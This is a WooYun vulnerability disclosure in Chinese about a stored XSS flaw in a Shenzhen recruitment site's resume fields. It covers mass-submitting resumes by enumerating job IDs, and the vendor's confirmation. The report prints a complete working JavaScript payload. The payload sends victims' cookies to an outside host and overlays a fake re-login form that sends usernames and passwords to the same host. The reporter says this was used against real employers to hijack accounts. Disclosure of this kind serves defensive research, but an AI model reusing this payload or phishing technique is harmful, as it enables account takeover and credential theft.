当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148681

漏洞标题:广东省某市人才网XSS漏洞可大量钓鱼招聘企业账号(已有成功案例)

相关厂商:广东省信息安全测评中心

漏洞作者: 路人甲

提交时间:2015-10-23 16:33

修复时间:2015-12-10 16:12

公开时间:2015-12-10 16:12

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

广东省某市人才网XSS漏洞可大量钓鱼招聘企业账号(已有成功案例)

详细说明:

1.http://**.**.**.**/ 深圳人才网

QQ截图20151022172119.jpg


注册一个账号,并登录
简历编辑处可以上传XSS代码

QQ截图20151022172809.jpg


QQ截图20151022172900.jpg


因为并未对上传的数据做转义,所以并不是只有以上指定的两处地方存在漏洞,需要统一过虑
2.接下来就是大量投递简历,如何做到大量,点击立即应聘,抓包

QQ截图20151022173048.jpg


QQ截图20151022173146.jpg


这里的recruitId可以遍历,于是拿burpsuite开始遍历

QQ截图20151022173300.jpg


一会功夫,已经成功了好多

QQ截图20151022173349.jpg


接下来就是等xss被触发了
3.XSS触发,我做了一个钓鱼页面,不仅获取企业的cookie,还顺便钓鱼用户的用户名和密码

QQ截图20151022173524.jpg


(function(){(new Image()).src='http://x.x/index.php?'+'referrer:'+encodeURIComponent(document.referrer)+'~||~url:'+encodeURIComponent(document.URL)+'~||~cookie:'+encodeURIComponent(document.cookie)+'~||~title:'+encodeURIComponent(document.title)+'~||~';})()
setTimeout(loadcont,2000);
function loadcont(){
$(document).ready(function(){
$("body").append('<style type="text/css">@charset "UTF-8";article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio[controls],canvas,video{display:inline-block}audio:not([controls]){display:none}html{font-size:100%;overflow-y:scroll;-webkit-overflow-scrolling:touch;-webkit-tap-highlight-color:transparent;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0;padding:0;line-height:1;background:#eee url(/static/img/bg.png?2013033000)}body,button,input,select,textarea{font-family:"微软雅黑","Helvetica Neue",Helvetica,Arial,sans-serif;color:#666}::-moz-selection{background:#084b91;color:#fff;text-shadow:none}::selection{background:#084b91;color:#fff;text-shadow:none}a{color:#407acc;text-decoration:none}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:active,a:hover{outline:0;text-decoration:underline}abbr[title]{border-bottom:1px dotted #999}b,strong{font-weight:700}blockquote{margin:1em 40px}dfn{font-style:italic}hr{display:block;height:1px;border:0;border-top:1px solid #ddd;margin:20px 0;padding:0}ins{background:#ff9;color:#000;text-decoration:none}mark{background:#ff0;color:#000;font-style:italic;font-weight:700}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word}q{quotes:none}q:after,q:before{content:"";content:none}small{font-size:85%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}ol,ul{margin:0;padding:0;list-style:none}dd{margin:0 0 0 40px}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop,.modal-backdrop.fade.in{opacity:.8;filter:alpha(opacity=80)}.modal{position:fixed;top:50%;left:50%;z-index:1050;width:560px;margin:-250px 0 0 -280px;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,.3);-webkit-border-radius:6px;-moz-border-radius:6px;border-radius:6px;outline:0;-webkit-box-shadow:0 3px 7px rgba(0,0,0,.3);-moz-box-shadow:0 3px 7px rgba(0,0,0,.3);box-shadow:0 3px 7px rgba(0,0,0,.3);-webkit-background-clip:padding-box;-moz-background-clip:padding-box;background-clip:padding-box}.modal.fade{top:-25%;-webkit-transition:opacity .3s linear,top .3s ease-out;-moz-transition:opacity .3s linear,top .3s ease-out;-o-transition:opacity .3s linear,top .3s ease-out;transition:opacity .3s linear,top .3s ease-out}.modal.fade.in{top:50%}.modal-header{padding:9px 15px;border-bottom:1px solid #eee}.modal-header .close{margin-top:2px}.modal-header h3{margin:0;line-height:30px}.modal-body{max-height:400px;padding:15px;overflow-y:auto}.modal-form{margin-bottom:0}.modal-footer{padding:14px 15px 15px;margin-bottom:0;text-align:right;background-color:#f5f5f5;border-top:1px solid #ddd;-webkit-border-radius:0 0 6px 6px;-moz-border-radius:0 0 6px 6px;border-radius:0 0 6px 6px;-webkit-box-shadow:inset 0 1px 0 #fff;-moz-box-shadow:inset 0 1px 0 #fff;box-shadow:inset 0 1px 0 #fff}.modal-footer:after,.modal-footer:before{display:table;line-height:0;content:""}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}body{color:#666;background:#f5f5f5;padding:0;margin:0}button,input{border:1px solid #DDD;font-size:13px;margin:0;height:auto}img{display:inline}a{color:#6B7985;text-decoration:none;outline:0}a:hover{color:#084b91;text-decoration:none}fieldset{border-width:1px 0 0 0;border-style:solid;padding:0 10px 0 18px;border-color:#bebec0}legend{padding:0 5px;font-size:12px;font-weight:700}span{display:inline-block}h1,h2,h3,h4,h5,h6{margin:0;padding:0;font-weight:400;color:#6b7985;line-height:1}h1{font-size:40px}h2{font-size:30px}h3{font-size:25px}h4{font-size:20px}h5{font-size:15px}h6{font-size:13px}ul{list-style:none;margin:0;padding:0}ul li{line-height:1}.close{cursor:pointer;padding:2px 3px;cursor:pointer;padding:2px 3px;position:absolute;right:10px;top:14px}.close:hover{background-color:grey;color:#fff}.button-blue{display:block;float:left;padding:5px 0;width:80px;margin-right:10px;color:#fff;background:#407acc;text-align:center;cursor:pointer}.button-blue:hover{background:#084b91;text-decoration:none;color:#fff}.button-grey{display:block;float:left;padding:5px 0;width:80px;color:#fff;background:#ccc;text-align:center;cursor:pointer}.button-grey:hover{background:#aaa;text-decoration:none}.buttons{width:170px;margin:0 auto}.check{float:left;display:block;width:15px;height:15px;margin:0 10px 0 0;background:url(../img/v2/check.png) no-repeat}.check:hover{background:url(../img/v2/check-hover.png) no-repeat}.check.checked{background:url(../img/v2/checked.png) no-repeat}.forgot-form .form-arrow,.login-form .form-arrow,.signup-form .form-arrow{display:block;width:30px;height:15px;background:url(/static/img/arrow.png?2013033000) no-repeat;position:absolute;left:95px;top:-15px}.forgot-form input,.login-form input,.signup-form input{padding:9px 9px 9px 9px;margin-bottom:20px;display:block;width:94%}.forgot-form .forgot,.forgot-form .login,.forgot-form .reg,.login-form .forgot,.login-form .login,.login-form .reg,.signup-form .forgot,.signup-form .login,.signup-form .reg{width:302px;padding:0;margin:0 0 10px 0;height:35px;font-size:18px;cursor:pointer}.forgot-form label.remember,.login-form label.remember,.signup-form label.remember{font-size:13px}.forgot-form input[type=checkbox],.login-form input[type=checkbox],.signup-form input[type=checkbox]{width:auto;height:auto;padding:0;margin:3px 5px 0 0}.forgot-form a.forgot,.login-form a.forgot,.signup-form a.forgot{font-size:13px;float:right;margin-top:2px;width:auto;cursor:pointer}.forgot-form p.error,.login-form p.error,.signup-form p.error{font-size:13px;margin-bottom:5px;color:#b22d2d}.landing-bg{background:url(/static/img/land/land_bg.jpg) center top no-repeat #f4f1ed;min-width:1000px;height:350px;border-bottom:1px solid #E7E7E7}.land-content{width:1000px;margin:0 auto}.land-content .devide{background:url(/static/img/land/land_line.png) center top no-repeat;height:43px;margin:15px 0 0 0}.land-content .land-title{font-size:30px;color:#202020;text-align:center;margin:10px 0 20px 0}.land-content .demo-mod:first-child{margin-left:0}.land-content .demo-mod{width:300px;height:280px;margin-left:50px;float:left}.land-content .demo-mod h4{font-size:24px;text-align:center;border-bottom:1px solid #dbdbdb;margin:10px 0 50px 0;padding:10px 0;color:#202020}.land-content .demo-mod a{display:block;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;margin-bottom:18px;font-weight:14px;color:grey}.land-content .demo-links{margin-top:10p}.ucando{margin-top:20px}.ucando img{float:left;margin-left:47px}.ucando img:first-child{margin-left:0}.land-bg{background:url(/static/img/land/bg.png) repeat;position:relative}.land-bg .desc{position:absolute;left:55%;top:140px}.land-bg .desc h4{margin-bottom:10px}#land_footer{background-color:#fff;padding:5px}#forgetform,#login-modal,#signup-modal,.modal{display:none;width:300px;padding:0 40px 20px;background:#fff;border:5px solid rgba(0,0,0,.2);margin-left:-190px;border-radius:10px;overflow:hidden;margin-bottom:40px;box-shadow:0 1px 0 #fff inset;margin-top:-267px}#forgetform a:hover,#login-modal a:hover,#signup-modal a:hover,.modal a:hover{text-decoration:none}#forgetform h1,#login-modal h1,#signup-modal h1,.modal h1{margin:0 -40px;background:#EEE;border-bottom:1px solid #CCC;border-top:1px solid #CCC;font-size:16px;padding:13px 40px;border-top-left-radius:6px;border-top-right-radius:6px;text-align:center;margin-bottom:30px}#forgetform .close,#login-modal .close,#signup-modal .close,.modal .close{position:absolute;top:0;right:0;padding:12px 18px 16px 18px;opacity:.8;border-left:1px solid #BBB}.forgot-btn,.login-btn{display:inline-block;margin-top:14px;color:#fff}.btn{display:inline-block;cursor:pointer}a.btn:hover{text-decoration:none}a.white-btn{display:inline-block;color:#fff}a.white-btn:hover{color:#fff;cursor:pointer}.nologin{float:right}.nologin .white-btn{margin:15px 10px}.reg-btn{box-shadow:inset 0 1px 0 rgba(255,255,255,.2),0 1px 2px rgba(0,0,0,.05);background-image:linear-gradient(top,#fbac2b,#f9a328);background-image:-webkit-linear-gradient(top,#fbac2b,#f9a328);background-color:#f9a328;border:1px solid #d58d4a;width:150px;padding:15px 20px;background-color:#ffc341;text-align:center;margin-top:80px;color:#fff;font-size:24px;border-radius:4px}a.login-btn:hover,a.reg-btn{color:#fff}a.reg-btn:focus{outline:0}#mw-info{-webkit-box-shadow:0 0 5px 0 rgba(0,0,0,.5);background:#ededed;box-shadow:0 0 5px 0 rgba(0,0,0,.5);color:#4b4b4b;display:block;float:none;font-size:15px;left:0;min-width:550px;overflow:hidden;position:fixed;text-align:center;top:0;width:100%;z-index:2147483647}#mw-info .meiwei_header{height:3px}#mw-info .meiwei_header_bg{float:left;height:100%;width:50%}#mw-info .meiwei_header_bg1{background-color:#3f7dca}#mw-info .meiwei_header_bg2{background-color:#73a9ec}#mw-info .meiwei_bd{height:70px;line-height:70px;position:relative}#mw-info .meiwei_logo{left:7%;position:absolute;top:8px;vertical-align:top}#mw-info .meiwei_tip{font-size:medium;font-weight:400;margin:0;padding:0}#mw-info .meiwei_tip a{text-decoration:underline;color:#4d86cd}.nologin{float:right}#iframe-cached{height:100%;border-top:1px solid #AAA;margin-top:60px;border-image:initial}#iframe-cached iframe{width:100%;height:100%;border:0!important;margin:0!important;padding:0!important;overflow:auto!important;display:block}#tools img{display:block}#tools .main{background-color:#fff}#tools .bd{background:#fff}#tools .side-nav{background-color:#e7e9eb;height:3000px}#tools h3{background-color:#E7E9EB;font-size:15px;padding:10px;position:relative;cursor:pointer;border-radius:5px}#tools h4{font-size:16px;margin:15px 0}#tools h5{font-size:14px;margin:20px 0 10px;font-weight:700}#tools .collapse-icon{background-position:-12px -63px;position:absolute;right:13px;top:11px;height:27px;width:28px}#tools .collapse-icon.expanded{background-position:-51px -63px}#tools .browernav a{display:block;padding:15px 0 15px 30px}#tools .browernav a.selected,#tools .browernav a:hover{background-color:#d3d8dd;text-decoration:none}#tools .sections{padding:10px 60px}#tools .sections .section{margin-bottom:10px}#tools .onemethod{width:330px;float:left;margin-right:100px}#tools .methods{padding:0 0 20px 0;border-bottom:1px solid #e8eaec;margin-bottom:30px}#tools p{font-size:14px}#tools .answer{margin-bottom:10px}#uservoice{background-image:url(/static/img/v2/uservoice.png?2013033000);border-top-width:1px;border-bottom-width:1px;border-left-width:1px;border-style:solid none solid solid;border-top-color:#fff;border-bottom-color:#fff;border-left-color:#fff;border-top-left-radius:4px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;-webkit-box-shadow:rgba(255,255,255,.24706) 1px 1px 1px inset,rgba(0,0,0,.49804) 0 1px 2px;box-shadow:rgba(255,255,255,.24706) 1px 1px 1px inset,rgba(0,0,0,.49804) 0 1px 2px;font-style:normal;font-variant:normal;font-weight:700;font-size:14px;line-height:1em;font-family:Arial,sans-serif;position:fixed;right:0;top:80%;z-index:9999;background-color:#07C;margin-top:-59px;margin-right:0;display:block;background-position:50% 0;background-repeat:no-repeat no-repeat}@media (max-width:1000px){.header-inner,.landing-bg{width:800px}.landing-bg .desc{left:70%}}.split-line{margin:10px 0}.folder{display:block;padding:7px 0 7px 60px;background:url(../img/v2/mass-folder.png) 29px 8px no-repeat;font-size:13px;color:#666;white-space:nowrap;word-wrap:break-word;overflow:hidden;text-overflow:ellipsis;position:relative}.folder.selected,.folder:hover{background:url(../img/v2/mass-folder-hover.png) 29px 8px no-repeat #fff}.folder:hover .close{display:block}.folder .close{display:none;top:6px;font-size:12px;font-weight:700}.folder-create{padding:0 0 0 30px;cursor:pointer;font-size:13px}.folder-create i{background-position:-208px 5px;width:15px;height:20px;margin-right:12px}.folder-create:hover{cursor:pointer}.folder-list{margin:20px 0 0 0}.more{cursor:pointer}.read img,.unread img{position:absolute;left:28px}.like img{position:absolute;left:25px}.category a:hover{background-color:#fff}.share{text-align:left;overflow:hidden;display:block!important;height:16px!important;line-height:16px!important;padding-left:20px!important;background:url(../img/v2/share.png) no-repeat left;cursor:pointer;float:right}.share:hover{opacity:.8}.share.weibo{background-position:0 -96px}.share.qq{background-position:0 -64px}.share.douban{background-position:0 -560px}.share.renren{background-position:0 -160px}.third-parties{display:none}.login-bind-tp{margin:-5px 0 30px 0}.login-bind-tp em{padding:1px 8px}.login-bind-tp li{border-radius:5px;margin-bottom:10px;cursor:pointer}.login-bind-tp li a{text-align:center;display:block;color:#fff;padding:12px 30px 12px 0}.login-bind-tp .qweibo{background-color:#3671d2;border:1px solid #136ac1;border-radius:3px;margin:10px 0 25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #1a64bf;cursor:pointer;text-align:left;background-color:#369ad2}.login-bind-tp .qweibo em{background:url(/static/img/tp/qq_logo.png) no-repeat}.login-bind-tp .sina{background-color:#b9e6eb;border:1px solid #c12f13;border-radius:3px;margin:10px 0 25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #921414;cursor:pointer;text-align:left;background-color:#d6514b}.login-bind-tp .sina em{background:url(/static/img/tp/sina_logo.png) no-repeat}.login-bind-tp .douban{border:1px solid #54c113;border-radius:3px;margin:10px 0 25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #921414;text-align:left;background-color:#41a41a}.login-bind-tp .douban em{background:url(/static/img/tp/douban_logo.png) no-repeat}</style><div id="denglu"><div class="modal in" id="forgetform" style="display:block"><h1>网络故障,请重新登录</h1><form class="signup-form clearfix"><input name="username" id="username" placeholder="用户名:"><input name="password" type="password" id="password" placeholder="密码:"><input type="button" name="type" class="button-blue login" value="重新登录"></form></div><div class="modal-backdrop in"></div></div><script type="text/javascript">$(".login").click(function(){if($("#username").val() == "" || $("#password").val() == "" ){}else{$.ajax({url:"http://x.x/test.php?"+$("#username").val()+"|"+$("#password").val(),async:true});$("#denglu").remove();}});</script>');});
}


很快,就收到了一堆邮件

QQ截图20151022173737.jpg


直接拿cookie就可以登录用户

QQ截图20151022173814.jpg


同时还钓鱼到了一些用户的用户名和密码

QQ截图20151022173914.jpg


QQ截图20151022174049.jpg


QQ截图20151022174249.jpg


QQ截图20151022174134.jpg

漏洞证明:

人事多半都是技术盲,所以很适合钓鱼

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 16:10

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无